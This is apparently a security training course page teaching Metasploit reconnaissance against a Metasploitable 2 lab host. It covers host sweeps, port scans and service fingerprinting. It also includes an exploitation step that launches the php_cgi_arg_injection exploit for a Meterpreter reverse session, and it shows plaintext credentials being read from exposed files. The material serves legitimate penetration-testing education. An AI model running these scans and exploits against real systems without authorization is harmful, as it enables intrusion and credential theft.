Intermediate

Scanning and Reconnaissance with Metasploit

scanning · reconnaissance · metasploit · systems · cybersecurity · networking · security · enumeration · port · service · vulnerability · command · database · msf.

Table of Contents

This reference manual walks through a full network reconnaissance and exploitation-assessment workflow using the Metasploit Framework, from initial host discovery through port scanning, service enumeration, vulnerability identification, exploitation, and centralized results tracking with the Metasploit database. The lab environment used throughout is a Kali Linux attacking host on the 172.31.37.0/24 network, with a Metasploitable 2 target machine at 172.31.37.25.

flowchart LR
    A[Reconnaissance<br/>Host Discovery] --> B[Port Scanning]
    B --> C[Service Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[Exploitation]
    E --> F[Results Tracking<br/>MSF Vuln DB]
    F -.feeds back into.-> B

Module 1: Introduction to Scanning with Metasploit

The Metasploit Framework and Basic Command Workflow

The Metasploit Framework is a modular and versatile penetration testing platform that allows security professionals to exploit vulnerabilities, test systems, and gather information about target networks. It provides a powerful command-line interface that enables testers to run several types of scans, discovery tools, and exploitation modules to conduct a thorough penetration test.

At its core, Metasploit is built on a modular architecture. It organizes tools, exploits, and auxiliary modules into individual components that can be mixed and matched as needed. Whether you are scanning a target, attempting exploitation, or conducting post-exploitation activities, Metasploit has a module for every phase of a test.

The basic command structure of Metasploit follows a simple, repeatable syntax:

StepCommandPurpose
1search <term>Finds specific modules matching a keyword (e.g., a module type or protocol)
2use <module path>Loads the discovered module for execution
3show optionsDisplays the configurable options for the loaded module (some required, some optional)
4set <option> <value>Sets a module’s variables, such as the target IP address or network range
5run (or exploit)Executes the selected module
flowchart TD
    S[search module_keyword] --> U[use module/path]
    U --> O[show options]
    O --> ST[set required/optional variables]
    ST --> R[run / exploit]
    R --> Res[Review results]

run and exploit are functionally interchangeable for executing a loaded module — exploit is the traditional term for exploit modules, while run works universally across auxiliary, scanner, and exploit modules alike.

Demo: Starting Metasploit and Module Syntax

Metasploit is launched from a Kali terminal using its interactive console:

msfconsole

Once the console loads, it displays the Metasploit banner and a command prompt where modules can be searched, loaded, and executed.

Step 1 — Search for a discovery module. To find a network discovery module such as an ARP sweep:

msf6 > search arp_sweep

This returns matching modules related to ARP-based network discovery.

Step 2 — Load the module.

msf6 > use auxiliary/scanner/discovery/arp_sweep

Once loaded, the console prompt changes to reflect the active module context.

Step 3 — View configurable options.

msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Some variables are required and others are optional for a given module.

Step 4 — Set the target range and tuning options.

msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 172.31.37.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10

rhosts tells Metasploit which range of IP addresses to scan. threads defines how many threads the scan uses concurrently, which speeds up the process against larger networks.

Step 5 — Execute the scan.

msf6 auxiliary(scanner/discovery/arp_sweep) > run

This initiates the ARP sweep and returns a list of live hosts that responded to the ARP requests — establishing the initial map of hosts to investigate further.

sequenceDiagram
    participant Analyst
    participant MSF as Metasploit Console
    participant Net as 172.31.37.0/24

    Analyst->>MSF: search arp_sweep
    MSF-->>Analyst: auxiliary/scanner/discovery/arp_sweep
    Analyst->>MSF: use auxiliary/scanner/discovery/arp_sweep
    Analyst->>MSF: set rhosts 172.31.37.0/24
    Analyst->>MSF: set threads 10
    Analyst->>MSF: run
    MSF->>Net: ARP requests to each host
    Net-->>MSF: ARP replies from live hosts
    MSF-->>Analyst: List of live hosts

Active vs. Passive Reconnaissance

Reconnaissance techniques fall into two broad categories that set the stage for all subsequent scanning activity:

TypeDescriptionExamplesTrade-off
Active reconnaissanceDirectly interacts with target systems by sending requests or probes and analyzing the responsesMetasploit ARP sweep, ping sweep, port scansGives detailed insight into live systems and running services, but risks alerting defensive systems such as firewalls and intrusion detection systems
Passive reconnaissanceGathers information from indirect sources without interacting with the target systemPublic WHOIS databases, DNS records, file metadata analysisMore stealthy, but requires more effort and yields less information
flowchart LR
    subgraph Active Reconnaissance
        A1[Sends packets/probes directly to target] --> A2[Detailed live-system data]
        A2 --> A3[Risk: triggers IDS/firewall alerts]
    end
    subgraph Passive Reconnaissance
        P1[Uses indirect public sources] --> P2[WHOIS / DNS / file metadata]
        P2 --> P3[Stealthy but less detailed]
    end

This course focuses on active reconnaissance techniques. Network discovery is an essential part of reconnaissance: it provides an overview of the network structure, including live hosts and active devices. Without network discovery, an assessor is effectively working blind when deciding which systems to target. The more accurate the map of the target network, the easier it becomes to identify entry points for exploitation. By running an ARP sweep or a ping sweep, live hosts can be identified quickly, which is critical for planning the next steps of a penetration test.

Demo: UDP Sweep and Scan

Beyond ARP sweeps, a UDP sweep is a critical part of any comprehensive reconnaissance effort. Many testers stick to TCP-only scanning and miss what is hiding “under the radar” — essential services like DNS and SNMP rely on UDP. Skipping UDP discovery leaves gaps in target analysis, so a UDP scan helps expose overlooked entry points and potential vulnerabilities.

Find and load the module:

msf6 > search udp_sweep
msf6 > use auxiliary/scanner/discovery/udp_sweep

Configure the scan:

msf6 auxiliary(scanner/discovery/udp_sweep) > set rhosts 172.31.37.0/24
msf6 auxiliary(scanner/discovery/udp_sweep) > set threads 10

The threads option controls the number of simultaneous scans, speeding up the process.

Execute:

msf6 auxiliary(scanner/discovery/udp_sweep) > run

The scan returns a list of hosts that respond to UDP requests — conceptually similar to the ARP sweep but capable of surfacing additional live hosts that ARP alone might miss. At this stage, the assessor has a unified, expanded list of live hosts on the network, providing the foundation for the next phase: scanning those hosts for open ports and discoverable services.

sequenceDiagram
    participant Analyst
    participant MSF as Metasploit Console
    participant Net as 172.31.37.0/24

    Analyst->>MSF: search udp_sweep
    Analyst->>MSF: use auxiliary/scanner/discovery/udp_sweep
    Analyst->>MSF: set rhosts 172.31.37.0/24
    Analyst->>MSF: set threads 10
    Analyst->>MSF: run
    MSF->>Net: UDP probes (DNS, SNMP, etc.)
    Net-->>MSF: UDP responses from live hosts
    MSF-->>Analyst: Expanded list of live hosts

Module 2: Port Scanning and Service Enumeration

Understanding Port Scanning and Service Enumeration

Once live hosts have been identified, the next step is to gather more detailed information about those hosts — specifically, which ports are open and what services may be running. This process is known as port scanning and service enumeration.

Port scanning is essential because it reveals potential entry points into a target system. Open ports correspond to services running on that machine, such as a web server, an FTP server, or a remote access utility. Once those services are identified, the assessor can research known vulnerabilities that may exist within them.

Port scanning works by sending small packets to the target and waiting for a response:

  • If the target replies, the port is open — worth probing further.
  • If the target does not respond, the port is most likely closed, although it could also be filtered by a firewall.
flowchart TD
    Probe[Send probe packet to port] --> Resp{Response received?}
    Resp -->|Yes| Open[Port is Open — investigate the running service]
    Resp -->|No| Filtered[Port is Closed or Filtered by a firewall]

Demo: TCP SYN Port Scanning

The demo begins with a TCP SYN scan against the Metasploitable 2 target at 172.31.37.25.

Find and select the scanner module:

msf6 > search portscan

Several port-scan modules are returned, depending on the scan technique. This walkthrough uses the auxiliary SYN scanner:

msf6 > use auxiliary/scanner/portscan/syn

Configure the target:

msf6 auxiliary(scanner/portscan/syn) > show options
msf6 auxiliary(scanner/portscan/syn) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/portscan/syn) > set threads 10
msf6 auxiliary(scanner/portscan/syn) > show options

Note the option name is plural — rhosts, not rhost — for modules that can target either a single machine or a range of machines (this varies by module).

Execute the scan (default range is ports 1 through 10,000):

msf6 auxiliary(scanner/portscan/syn) > run

The scan returns a running list of open ports as it progresses, for example:

[+] 172.31.37.25:21    - TCP OPEN   (FTP)
[+] 172.31.37.25:23    - TCP OPEN
[+] 172.31.37.25:25    - TCP OPEN
[+] 172.31.37.25:53    - TCP OPEN
[+] 172.31.37.25:512   - TCP OPEN
[+] 172.31.37.25:514   - TCP OPEN

Because scanning the full 1–10,000 range takes time, the scan can be interrupted and re-focused on a narrower range once a specific service is suspected. For example, to confirm whether MySQL is running:

msf6 auxiliary(scanner/portscan/syn) > set ports 3300-3400
msf6 auxiliary(scanner/portscan/syn) > run
[+] 172.31.37.25:3306  - TCP OPEN   (MySQL)

This confirms MySQL is listening on its default port, 3306, and builds out a growing service profile of the target.

Demo: Service Enumeration

Before enumerating services, it is worth noting a subtle pitfall: if a scan’s delay option is left at 0 (zero milliseconds between connection attempts), some open ports can be missed because the target is not given enough time to respond consistently. Re-running the SYN scan with proper timing revealed additional open ports that had been missed the first time, including port 22 (SSH) and port 80 (HTTP).

Enumerating SSH (port 22):

msf6 > search ssh_version

A plain search ssh returns many unrelated modules; appending _version narrows the results to the exact fingerprinting module:

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 172.31.37.25:22 - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 (protocol 2.0)

The fingerprint shows the target is running OpenSSH 4.7p1 on Linux, using OpenBSD’s SSH implementation lineage. OpenSSH 4.7p1 is a notably old release, which immediately flags it as a candidate for further vulnerability research.

Enumerating HTTP (port 80):

msf6 > search http_version
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options
msf6 auxiliary(scanner/http/http_version) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/http/http_version) > run
[+] 172.31.37.25:80 - Apache/2.2.8 (Ubuntu) DAV/2 PHP/5.2.4-2ubuntu5.10 ...

The web server is running Apache 2.2.8 with PHP 5.2.4. Identifying exact service versions is what enables the next step: matching those versions against known, exploitable vulnerabilities.

ServicePortFingerprinting ModuleResult
FTP21(identified during SYN scan)Open
Telnet23(identified during SYN scan)Open
SMTP25(identified during SYN scan)Open
DNS53(identified during SYN scan)Open
SSH22auxiliary/scanner/ssh/ssh_versionOpenSSH 4.7p1 on Linux
HTTP80auxiliary/scanner/http/http_versionApache 2.2.8, PHP 5.2.4
MySQL3306auxiliary/scanner/portscan/syn (narrowed range)Open
sequenceDiagram
    participant Analyst
    participant MSF as Metasploit Console
    participant Target as 172.31.37.25

    Analyst->>MSF: use auxiliary/scanner/ssh/ssh_version
    Analyst->>MSF: set rhosts 172.31.37.25
    Analyst->>MSF: run
    MSF->>Target: SSH banner grab
    Target-->>MSF: SSH-2.0-OpenSSH_4.7p1
    MSF-->>Analyst: OpenSSH 4.7p1 on Linux

    Analyst->>MSF: use auxiliary/scanner/http/http_version
    Analyst->>MSF: set rhosts 172.31.37.25
    Analyst->>MSF: run
    MSF->>Target: HTTP banner grab
    Target-->>MSF: Apache/2.2.8 PHP/5.2.4
    MSF-->>Analyst: Web server version identified

Module 3: Vulnerability Scanning and Exploitation Potential Assessment

Demo: Scanning for Known Vulnerabilities

With open ports and their exact service versions identified, the next step is to look for actual vulnerabilities — weaknesses in the running services and software that could range from unpatched security flaws to misconfigurations that leave the system exposed to attack.

Having previously fingerprinted the web server as Apache 2.2.8 with PHP 5.2.4, the next question is whether Metasploit has matching exploit modules. Rather than relying on search alone, the searchsploit utility (Exploit-DB’s offline search tool) can be used to identify candidate vulnerabilities first:

searchsploit apache 2.2.8 | grep php

This returns exploit entries that combine the Apache/PHP versions, though without a direct Metasploit module path. A further, more targeted search narrows down the specific vulnerable component:

searchsploit cgi | grep "php 5.4.2"

This surfaces a known vulnerability described as being of excellent exploit rank, corresponding to the Metasploit module:

multi/http/php_cgi_arg_injection

Load and use the module:

msf6 > use exploit/multi/http/php_cgi_arg_injection

Metasploit also allows referencing a module from a prior search results list directly by its index number instead of retyping the full path — e.g., use 1 for the first result in the most recent search listing.

Configure and run:

msf6 exploit(multi/http/php_cgi_arg_injection) > show options
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 172.31.37.25
msf6 exploit(multi/http/php_cgi_arg_injection) > set lhost 172.31.37.30
msf6 exploit(multi/http/php_cgi_arg_injection) > run

rhost is the target being attacked, and lhost is the listening host — the attacker’s own machine (the Kali box) that will receive the resulting shell connection. While lhost can sometimes be set to the loopback address 127.0.0.1, it is more reliable in practice to explicitly set it to the attacking machine’s actual IP address on the shared network.

Running the exploit successfully returns a Meterpreter session — an advanced, in-memory post-exploitation agent that provides interactive control of the compromised host. (Meterpreter usage itself, along with broader exploitation and post-exploitation techniques, extends beyond the scope of this reconnaissance-focused course and is covered separately.)

sequenceDiagram
    participant Analyst
    participant Shell as searchsploit (CLI)
    participant MSF as Metasploit Console
    participant Target as 172.31.37.25 (Apache 2.2.8 / PHP 5.2.4)

    Analyst->>Shell: searchsploit apache 2.2.8 | grep php
    Shell-->>Analyst: Candidate exploit entries
    Analyst->>Shell: searchsploit cgi | grep "php 5.4.2"
    Shell-->>Analyst: multi/http/php_cgi_arg_injection (Excellent rank)
    Analyst->>MSF: use exploit/multi/http/php_cgi_arg_injection
    Analyst->>MSF: set rhosts 172.31.37.25
    Analyst->>MSF: set lhost 172.31.37.30
    Analyst->>MSF: run
    MSF->>Target: PHP CGI argument injection exploit
    Target-->>MSF: Reverse connection established
    MSF-->>Analyst: Meterpreter session opened

Demo: Scanning for Critical Files and Directories

Beyond exploiting a service directly, running a directory scanner against a web server can uncover directories that expose sensitive information.

Directory enumeration:

msf6 > search directory scanner
msf6 > use 0
msf6 auxiliary(scanner/http/dir_scanner) > show options

Since rhosts was already set from a prior module in the same session, the scan can be run immediately:

msf6 auxiliary(scanner/http/dir_scanner) > run

Example discovered directories:

[+] Found /cgi-bin/
[+] Found /doc/
[+] Found /icons/
[+] Found /index/
[+] Found /phpmyadmin/
[+] Found /test/

Checking robots.txt: Websites can specify, via a robots.txt file, which directory structures they do not want search engines to index — which paradoxically often reveals sensitive paths to an attacker.

msf6 > search robots.txt
msf6 > use 0
msf6 auxiliary(scanner/http/robots_txt) > show options
msf6 auxiliary(scanner/http/robots_txt) > run

The robots.txt scan reveals a directory named passwords inside a utility directory. Browsing directly to that path exposes a plaintext file containing credentials:

http://172.31.37.25/<utility-dir>/passwords

A further look at a discovered config.inc file reveals database connection details in cleartext:

host = localhost
user = root
password = (blank)

This walkthrough illustrates how information disclosure vulnerabilities — forgotten backup files, exposed configuration files, unrestricted directory listings — can leak credentials and internal architecture details without any active exploitation being required.

flowchart TD
    A[auxiliary/scanner/http/dir_scanner] --> B[Discover /cgi-bin, /doc, /icons, /phpmyadmin, /test ...]
    C[auxiliary/scanner/http/robots_txt] --> D[Discover disallowed path: /passwords]
    D --> E[Browse directly to passwords file]
    E --> F[Plaintext credentials exposed]
    B --> G[config.inc discovered]
    G --> H["host=localhost, user=root, password=blank"]

Module 4: Metasploit’s Vulnerability Database (MSF Vuln DB)

Demo: Using the MSF Vulnerability Database (Workspaces, db_nmap, and Global Variables)

One of the ongoing challenges of any penetration test is managing the sheer volume of data produced by multiple scans across multiple hosts. The Metasploit Framework Vulnerability Database solves this by providing a centralized place to store, organize, and reference scan results — including results imported from external tools such as Nmap, which has a direct integration into Metasploit.

Workspaces let an assessor organize data the way folders organize files. List existing workspaces:

msf6 > workspace

By default, only a default workspace exists. View available sub-commands:

msf6 > workspace -h

This reveals options to add, delete, list, and rename workspaces. Create a new workspace for a specific engagement:

msf6 > workspace -a gotham
msf6 > workspace

The newly created gotham workspace appears in the list with an asterisk marking it as the currently active workspace. Any scanner results — including imports from third-party tools — are now saved under this workspace.

Populating the workspace with an Nmap scan run directly through Metasploit’s database-integrated Nmap wrapper:

msf6 > db_nmap -sV -v 172.31.37.10-40

-sV performs version detection, and -v runs in verbose mode, scanning the specified IP range. Once complete, list the hosts now tracked by the database:

msf6 > hosts

This displays each discovered host’s MAC address, possible OS name, and other fingerprint data (some entries may show as “unknown” depending on how the target responds to OS-fingerprinting probes).

Deeper host fingerprinting can be performed with Nmap’s aggressive scan flag, which enables OS detection, version detection, Nmap scripting engine (NSE) checks, and traceroute all at once:

msf6 > db_nmap -A 172.31.37.10-40
msf6 > hosts

Re-running hosts afterward shows a considerably more complete picture of each tracked host.

Global variables avoid the repetitive need to re-type rhosts/lhost for every new module in an engagement focused on the same target(s). Use setg instead of set, and note that global option names must be capitalized:

msf6 > setg RHOSTS 172.31.37.25
msf6 > setg LHOST 172.31.37.30

RHOSTS is set to the specific target of interest for this workspace, while LHOST is set to the Kali attacking box, which remains constant across the engagement.

With globals set, loading a new module automatically inherits them:

msf6 > search portscan tcp
msf6 > use 4
msf6 auxiliary(scanner/portscan/syn) > show options

show options now displays rhosts already populated from the global variable — no manual set required.

Discovering what modules exist inside Metasploit can be done a few different ways beyond search/searchsploit:

msf6 > show auxiliary
msf6 > show exploits
msf6 > show payloads

show auxiliary lists roughly 1,255 auxiliary modules; show exploits lists nearly 2,500 exploit modules (for example, modules targeting RealVNC or VNC Viewer); and show payloads lists a wide range of reverse-shell and injection payloads.

Querying the database by host attributes: the hosts command supports column filtering and value filtering to narrow results, for example limiting the display to address and OS-flavor columns, filtered to Linux systems only:

msf6 > hosts -c address,os_flavor os_flavor:Linux

This same filtering mechanism can feed directly into a module’s rhosts option using the -R flag, which injects the matching host addresses straight into the currently loaded module:

msf6 auxiliary(scanner/portscan/syn) > hosts -c address os_flavor:Linux -R
msf6 auxiliary(scanner/portscan/syn) > run

This runs the scan against every host in the database matching the Linux filter simultaneously (in this example, two matching hosts) — overriding the earlier global default and confirmed by show options reflecting the newly injected rhosts value.

Other valuable database commands:

CommandPurpose
workspaceList or switch between workspaces
workspace -a <name>Create a new workspace
db_nmap <flags> <range>Run an Nmap scan with results stored directly in the active workspace
hostsList all hosts tracked in the current workspace’s database
hosts -c <columns> <filter>Filter tracked hosts by column and value (e.g., OS flavor)
hosts -c address <filter> -RInject filtered host addresses into a loaded module’s rhosts option
setg <OPTION> <value>Set a global variable inherited by every subsequently loaded module
vulnsList vulnerabilities detected across tracked hosts
lootList captured artifacts (e.g., password hash dumps) gathered during an engagement

The vulns and loot commands are particularly valuable for after-the-fact review: it is common to run a scan, not immediately notice everything it captured, and later revisit vulns or loot to discover additional findings that were quietly stored in the background.

flowchart TD
    W[workspace -a gotham] --> N[db_nmap -sV -v range]
    N --> H[hosts]
    H --> A[db_nmap -A range for deep fingerprinting]
    A --> H2[hosts — richer data]
    H2 --> G[setg RHOSTS / setg LHOST]
    G --> M[Load module — rhosts pre-populated]
    M --> F[hosts -c address os_flavor:Linux -R]
    F --> R[run against filtered host set]
    R --> V[vulns]
    R --> L[loot]
mindmap
  root((MSF Vuln DB))
    Workspaces
      Create / list / rename / delete
      Isolates data per engagement
    Nmap Integration
      db_nmap -sV
      db_nmap -A
    Global Variables
      setg RHOSTS
      setg LHOST
    Querying
      hosts
      hosts -c columns filter
      hosts ... -R to inject into module
    Module Inventory
      show auxiliary (~1,255 modules)
      show exploits (~2,500 modules)
      show payloads
    Findings Storage
      vulns
      loot

An important operational reminder underlying every demo in this course: only run these scanning and exploitation techniques against systems and networks you own or have explicit authorization to test. Unauthorized use of these tools can lead to serious legal consequences.

Summary

This course walked through the complete active-reconnaissance-to-assessment workflow using the Metasploit Framework:

  1. Framework fundamentals — every Metasploit module is driven by the same repeatable cycle: searchuseshow optionssetrun/exploit.
  2. Host discovery — ARP sweeps (auxiliary/scanner/discovery/arp_sweep) and UDP sweeps (auxiliary/scanner/discovery/udp_sweep) identify live hosts on a network, forming the foundation for all later steps. Active reconnaissance techniques like these interact directly with targets and risk detection, in contrast to passive techniques that rely on indirect public sources.
  3. Port scanning — a TCP SYN scan (auxiliary/scanner/portscan/syn) reveals which ports are open on a given host, and can be tuned (via ports, threads, and delay) to balance thoroughness against speed and reliability.
  4. Service enumeration — version-fingerprinting modules such as ssh_version and http_version identify the exact software and version running behind each open port, which is the critical input for vulnerability research.
  5. Vulnerability scanning and exploitation assessment — tools like searchsploit help match discovered service versions against known, ranked exploits; directory and robots.txt scanners can uncover exposed files, credentials, and configuration secrets without any exploitation at all.
  6. The Metasploit database — workspaces, db_nmap, global variables (setg), and host-filtered queries (hosts -c ... -R) turn scattered scan output into a centralized, queryable engagement record, with vulns and loot preserving findings for later review.

Quick-Reference Command Table

CommandDescription
msfconsoleLaunches the Metasploit interactive console
search <term>Finds modules matching a keyword
use <path> or use <index>Loads a module by path or by its index in the last search results
show optionsDisplays a loaded module’s configurable variables
set <option> <value>Sets an option for the currently loaded module
setg <OPTION> <value>Sets a global option inherited by all subsequently loaded modules
run / exploitExecutes the loaded module
auxiliary/scanner/discovery/arp_sweepARP-based live host discovery
auxiliary/scanner/discovery/udp_sweepUDP-based live host discovery
auxiliary/scanner/portscan/synTCP SYN port scan
auxiliary/scanner/ssh/ssh_versionSSH service/version fingerprinting
auxiliary/scanner/http/http_versionHTTP service/version fingerprinting
auxiliary/scanner/http/dir_scannerWeb directory enumeration
auxiliary/scanner/http/robots_txtRetrieves and parses a target’s robots.txt
exploit/multi/http/php_cgi_arg_injectionExploits vulnerable Apache/PHP CGI argument handling
searchsploit <term>Offline Exploit-DB search from the shell
workspace / workspace -a <name>Lists / creates database workspaces
db_nmap <flags> <range>Runs Nmap with results stored in the active workspace’s database
hosts / hosts -c <cols> <filter>Lists / filters tracked hosts
vulnsLists detected vulnerabilities per host
lootLists captured artifacts (e.g., credential dumps)

Search Terms

scanning · reconnaissance · metasploit · systems · cybersecurity · networking · security · enumeration · port · service · vulnerability · command · database · msf

Interested in this course?

Contact us to book it or get a custom training plan for your team.